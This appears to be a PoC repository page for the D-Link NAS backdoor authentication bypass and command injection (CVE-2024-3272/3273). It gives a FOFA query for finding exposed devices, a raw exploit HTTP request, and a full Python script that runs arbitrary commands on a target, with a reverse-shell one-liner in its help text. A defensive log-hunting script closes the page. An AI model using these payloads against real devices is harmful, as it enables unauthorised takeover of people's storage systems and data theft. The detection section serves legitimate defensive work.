## D-Link-NAS(CVE-2024-3272&&CVE-2024-3273)

## fofa

```
body="Text:In order to access the ShareCenter"
```

## poc

```
GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd==&cmd=15&system=aWQ= HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Linux; Android 8.0.0) AppleWebKit/531.0 (KHTML, like Gecko) Chrome/40.0.874.0 Safari/531.0
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: close
```

![1f355c5370398227eca27bbebee72708](https://github.com/wy876/POC/assets/139549762/b0107148-fdd2-461d-aeff-d9c50a2069a8)

## Script

```python
# Author: Nick Swink (c0rnbread)
# Original post: https://github.com/netsecfish/dlink
# CVE-2024-3272 + CVE-2024-3273
#
# Description: Backdoor Authentication Bypass + Command Injection
# Affected Devices:
#   DNS-320L Version 1.11, Version 1.03.0904.2013, Version 1.01.0702.2013
#   DNS-325 Version 1.01
#   DNS-327L Version 1.09, Version 1.00.0409.2013
#   DNS-340L Version 1.08

import requests, argparse, base64

def main(url, command):
    base64_command = base64.b64encode(command.encode('utf-8'))
    base64_command = base64_command.decode('utf-8')
    uri = f"/cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system={base64_command}"

    print("Sending exploit request to endpoint...")
    print(url + uri)
    r = requests.get(url + uri)

    if r.status_code == 200:
        print("Status code: 200")
        print("Exploit appeared to succeed!")
        print(f"\n\tPrinting output: {base64.b64decode(r.text).decode('utf-8')}")
    else:
        print("Status NOT 200")
        print("Exploit Failed. Exiting...")
        exit()

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Execute arbitrary command on remote system.")
    parser.add_argument("url", help="Base URL of the D-Link web interface. e.g., http://example.com")
    parser.add_argument("command", help="Command to be executed. e.g., /bin/sh -i >& /dev/tcp/localhost/9999 0>&1")
    args = parser.parse_args()
    main(args.url, args.command)
```
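
For defenders, the request shape in the PoC above (`/cgi-bin/nas_sharing.cgi` with `user=messagebus` and a base64 `system=` value) can be hunted for in web access logs. The following is an added example, not code from the original page or its authors; it assumes combined-format logs from a proxy or web server in front of the NAS, and the function names and sample log lines are constructed for illustration.

```python
import base64, binascii, re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample entries; addresses are from documentation ranges.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Apr/2024:08:15:02 +0000] "GET /cgi-bin/nas_sharing.cgi'
    '?user=messagebus&passwd=&cmd=15&system=aWQ= HTTP/1.1" 200 52 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [10/Apr/2024:08:16:40 +0000] "GET /cgi-bin/nas_sharing.cgi'
    '?user=admin&passwd=c2VjcmV0&cmd=1 HTTP/1.1" 200 310 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [10/Apr/2024:08:17:11 +0000] "GET /web/images/logo.png HTTP/1.1" 200 4096',
]

def decode_system(value):
    """Best-effort base64 decode of the system= value for analyst triage."""
    value = value.replace(" ", "+")       # parse_qs turns '+' into a space
    value += "=" * (-len(value) % 4)      # tolerate stripped padding
    try:
        return base64.b64decode(value, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None

def inspect_line(line):
    """Return a finding dict when the line matches the PoC request, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("/cgi-bin/nas_sharing.cgi"):
        return None
    params = parse_qs(url.query, keep_blank_values=True)
    if params.get("user", [""])[0] != "messagebus":
        return None
    system = params.get("system", [""])[0]
    return {
        "source_ip": line.split(" ", 1)[0],
        "cmd": params.get("cmd", [None])[0],
        "decoded_system": decode_system(system) if system else None,
    }

def scan(lines):
    """Collect findings for every matching line."""
    return [f for f in map(inspect_line, lines) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A hit with HTTP status 200 on one of the affected models listed in the script header is worth treating as a probable compromise rather than a scan, since the decoded `system` value shows what was run.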